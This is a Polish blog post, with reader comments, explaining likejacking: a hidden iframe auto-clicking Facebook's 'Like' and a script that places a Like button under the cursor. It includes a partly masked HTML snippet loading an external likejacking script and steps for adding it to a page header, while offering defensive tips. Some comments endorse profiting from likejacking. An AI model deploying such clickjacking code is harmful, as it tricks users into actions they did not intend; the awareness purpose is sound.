Na pewno Ty lub ktoś z Twoich znajomych padło już ofiarą skryptów autolike. Oglądasz posty na Facebooku, widzisz interesujący klip wideo, np. panienka na miniaturce czy kadr z filmu z fragmentem jakiegoś obiektu i pytanie Co to jest? Dodajesz komentarz i nagle okazuje się, że post wylądował na Twoim profilu. Jak to działa i w jaki sposób fanpage nabija sobie fanów? Słów kilka o metodach LikeJacking.
Określeniem LikeJacking nazywamy metody, których celem jest nabicie licznika Lubię to fanpageowi na Facebook. Chodzi o to, aby profil miał jak najwięcej fanów, bez względu na to, czy fani są świadomi oddania swojego lajka. Jedną
z tego typu metod jest ClipJacking.
Likejacking – jak to działa?
Po pierwsze trzeba zwrócić uwagę użytkownika, zachęcić go do kliknięcia. Na mężczyzn działają zazwyczaj takie miniaturki przy wpisach komunikujące, że któryś z naszych znajomych lubi ten klip 😉
Skoro udało się już zwrócić Twoją uwagę i kliknąłeś w filmik to zostałeś przekierowany na nową zakładkę i zapewne obejrzysz całość zawartości. Tymczasem w kodzie docelowej witryny masz:
ukryty iframe:
który ładuje fblike.html
Skrypt umieszczony w kodzie fblike.html powoduje automatyczne wykonanie operacji takiej samej jak procedura kliknięcia w Lubię to. Dzieje się to automatycznie, ponieważ użytkownik jest zalogowany do Facebooka – w końcu
z tamtą trafiłeś na filmik.
Klip na stronie z oszustwem ma 99% szans na to, że nie działa ale sam fakt wejścia na tą stronę powoduje dodanie na Twojej tablicy informacji, że Lubisz To: i tu będzie ta sama miniaturka, która zainteresowała Cię na tablicy znajomego.
Jak się przed tym bronić?
Jeśli masz ochotę mimo wszystko sprawdzać podejrzane linki na tablicy znajomego to najbezpieczniejszą metodą jest robienie tego w innej przeglądarce. Używasz np. Firefox i widzisz na tablicy znajomego teoretycznie interesujący link – klikasz prawym klawiszem, kopiujesz adres odnośnika i wklejasz go w pasku adresu innej przeglądarki – Opera, Chrome, Internet Explorer. Jeśli okaże się fałszywy to nic się nie stanie. ponieważ klik w Lubię To nie zadziała bo
w zapasowej przeglądarce nie jesteś zalogowany do serwisu.
Druga metoda to podpięcie przycisku Lubię to pod kursor myszy. Działa to skuteczniej na rzetelnych stronach i sprawia, że kliknięcie w dowolny URL na stronie powoduje pojawienie się tuż pod kursorem przycisku Lubię To. Z reguły czas reakcji i spostrzegawczość użytkowników są niewystarczające i jak zauważymy znaczek podniesionego kciuka to już jest po kliknięciu.
Jak działa taki trick? W kodzie witryny wstawiony będzie skrypt podobny do tego poniżej:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>No Cookiecheck, activation at click</title>
<script src="//code.*.com/jquery-1.5.js"></script>
<script src="//connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.********* = 1</script>
<script src="//likejacking.*********.eu/likejacking.php"></script>
</head>
<body>
<a href="javascript:(function(){var s = document.createE*('script');s.src =
'//likejacking.*.eu/likejacking.php?url=facebook.com&time=10&test'
;document.getElementsByTagName
('body')[0].appendChild(s);})();">View Demo</a>
</body>
</html>Efekt wygląda następująco:
Wskazanie kursorem linka View Demo powoduje pojawienie się pod kursorem przycisku like, który wykona klik
w Lubię To równocześnie z kliknięciem w URL.
Metoda zaimplementowania tego tricku to zmiana headera naszej strony i dodanie:
<script src="//code.**.com/jquery-1.5.js"></script> <script src="//connect.facebook.net/en_US/all.js#xfbml=1"></script> <script>window.********** = 1</script> <script src="clickjacking.js"></script>
W wywoływanym skrypcie clickjacking.js na serwerze jest umieszczony kod taki jak tutaj podany.
Trzeba pamiętać, że ta metoda nie jest inicjowana na Facebooku. Zalogowany użytkownik klika w link na tablicy znajomego, a działa na dowolnej www, a więc jeśli użytkownik nie jest aktualnie zalogowany do Facebooka np. w innej zakładce to pojawi się iframe z prośbą o zalogowanie się.
Różnice?
Różnica między pierwszą a drugą metodą polega na użyciu w pierwszej z nich skryptu linkowanego z zewnętrznego serwera, a w drugiej lokalnie przechowywanego.
Pamiętaj również, że wszystkie tu podane skrypty są przykładami i nie powinieneś używać ich na Twojej stronie www nawet jeśli uda Ci się poprawić błędy, które celowo w nich zrobiłem.
LikeJacking jest bardzo kuszącą metodą dla właściciel młodych stron, którzy chcą jak najszybciej stworzyć dużą „społeczność fanów” wokół marki. Ciężko tu mówić jednak o zaangażowaniu bo mało kto chcę oddać swojego lajka stronie, która wykorzystuje bardziej jego brak czujności niż faktyczną chęć przyłączenia się. Padłeś kiedyś ofiarą takiego zabiegu? Tak czy nie, podziel się swoimi spostrzeżeniami w komentarzu!
Świetny post. Przydatne HTML. Gatuluję!
P.S.: http://wczteryoczy.blog.pl -zapraszam!!! 😉
Witam, ja stosuje od dawna LikeJacking. W zasadzie od poczatki istnienia przycisku 'Like’ na FB.Tylko co to ma wspolnego z bezpieczenstwem? I co za roznica jaka metoda? Dopoki ludzie reaguja na ilosc 'lajkow’ bedziemy wymyslac dziesiatki nowych metod. Chcesz to zwalczyc? Edukuj ludzi, zaproponuj im powrot do konsoli, aby nauczyc ich rozumiec co sie dokladnei dzieje na ich maszynie – oni jednak wola instalacje jednym przyciskiem od micro$hitu? I ustecznianie sie? to ma swoje plusy, rosnie coraz wieksza przepasc pomiedzy tymi co maja pojecie o czymkolwiek a reszta ktora jest juz gleboko uspiona. Mozna nimi dowolnie manipulowac, nie zgodzisz sie… Dowiedz się więcej »
jak to ustawic?
Jak ustawić „co”?
@cesarion atnonius
Właśnie w tym cel – uświadomić ludzi, że takie praktyki mają miejsce. Sam zauważyłeś, że „Like`i” są popularne, ludzie patrzą na ich ilość więc nie zaszkodzi uświadomić użytkowników, że są przypadki kiedy mogą coś oznaczyć jako lubiane zupełnie nieświadomie.
Ten blog to nie tylko bezpieczeństwo ale też porady dla użytkowników – ten post to właśnie jedna z nich próba nauczenia ludzi choć odrobinę więcej spostrzegawczości i roztropności w sieci.
Znam ludzi którzy zarabiaja na likejackingu i nie okradają nikogo z żadnych danych osobowych, zarabiają na reklamach. I życzę im sukcesów bo do niedawna nie mieli za dużo w lodówce a teraz już mają. http://jak-zarobic-w-sieci.blogspot.com/2013/03/likejacking-po-polsku.html
swietny post. Przydatne HTML. Gatuluje!P.S.: http://wczteryoczy.blog.pl -zapraszam!!! 😉
Witam, ja stosuje od dawna LikeJacking. W zasadzie od poczatki istnienia przycisku 'Like’ na FB.Tylko co to ma wspolnego z bezpieczenstwem? I co za roznica jaka metoda? Dopoki ludzie reaguja na ilosc 'lajkow’ bedziemy wymyslac dziesiatki nowych metod. Chcesz to zwalczyc? Edukuj ludzi, zaproponuj im powrot do konsoli, aby nauczyc ich rozumiec co sie dokladnei dzieje na ich maszynie – oni jednak wola instalacje jednym przyciskiem od micro$hitu? I ustecznianie sie? to ma swoje plusy, rosnie coraz wieksza przepasc pomiedzy tymi co maja pojecie o czymkolwiek a reszta ktora jest juz gleboko uspiona. Mozna nimi dowolnie manipulowac, nie zgodzisz sie… Dowiedz się więcej »
@cesarion atnoniusWlasnie w tym cel – uswiadomic ludzi, ze takie praktyki maja miejsce. Sam zauwazyles, ze „Like`i” sa popularne, ludzie patrza na ich ilosc wiec nie zaszkodzi uswiadomic uzytkownikow, ze sa przypadki kiedy moga cos oznaczyc jako lubiane zupelnie nieswiadomie.Ten blog to nie tylko bezpieczenstwo ale tez porady dla uzytkownikow – ten post to wlasnie jedna z nich proba nauczenia ludzi choc odrobine wiecej spostrzegawczosci i roztropnosci w sieci.
jak to ustawic?
Jak ustawic „co”?
Znam ludzi ktorzy zarabiaja na likejackingu i nie okradaja nikogo z zadnych danych osobowych, zarabiaja na reklamach. I zycze im sukcesow bo do niedawna nie mieli za duzo w lodowce a teraz juz maja. http://jak-zarobic-w-sieci….